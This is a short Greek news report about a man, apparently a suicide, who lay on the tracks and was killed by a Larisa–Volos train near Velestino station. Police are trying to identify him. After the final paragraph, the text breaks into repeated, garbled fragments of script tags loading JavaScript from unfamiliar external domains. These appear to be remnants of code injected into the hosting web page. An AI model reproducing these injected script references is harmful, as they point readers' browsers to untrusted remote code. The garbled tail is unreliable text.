Βελεστίνο: Τραγικός θάνατος άνδρα που ξάπλωσε στις γραμμές του τρένου

Βελεστίνο: Τραγικός θάνατος άνδρα που ξάπλωσε στις γραμμές του τρένου

Τραγικό θάνατο βρήκε ένας άνδρας, το μεσημέρι της Κυριακής (08/02), περίπου 100 μέτρα πριν τον σιδηροδρομικό σταθμό Βελεστίνου.

Ο άτυχος άνδρας ξάπλωσε στις γραμμές του τρένου με αποτέλεσμα η αμαξοστοιχία 1576, που κατευθυνόταν από Λάρισα προς Βόλο, να τον παρασύρει.

Οι αρχές ερευνούν το ενδεχόμενο αυτοκτονίας και ψάχνουν την ταυτότητά του, καθώς ο άτυχος άνδρας δεν είχε πάνω του στοιχεία.

Όπως αναφέρουν οι σχετικές πληροφορίες, το δυστύχημα έγινε στις 12.10 το μεσημέρι, όταν το τρένο που ερχόταν από Λάρισα προς Βόλο, πλησίαζε στον σταθμό του Βελεστίνου.
Περίπου 100 μ. πριν τον σταθμό, ο άνδρας που πιθανολογείται ότι είναι ηλικίας 45 – 50 χρονών, ξάπλωσε στις σιδηροδρομικές γραμμές, ωστόσο ο μηχανοδηγός δεν μπόρεσε να αντιδράσει.

Ενημερώθηκαν το ΕΚΑΒ και αστυνομικοί του Α.Τ. Βελεστίνου, που βρίσκονται επί τόπου, ενώ γίνεται προσπάθεια να διακριβωθεί η ταυτότητας του θύματος, καθώς πάνω του δεν βρέθηκαν η ταυτότητα ή άλλα έγγραφα.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >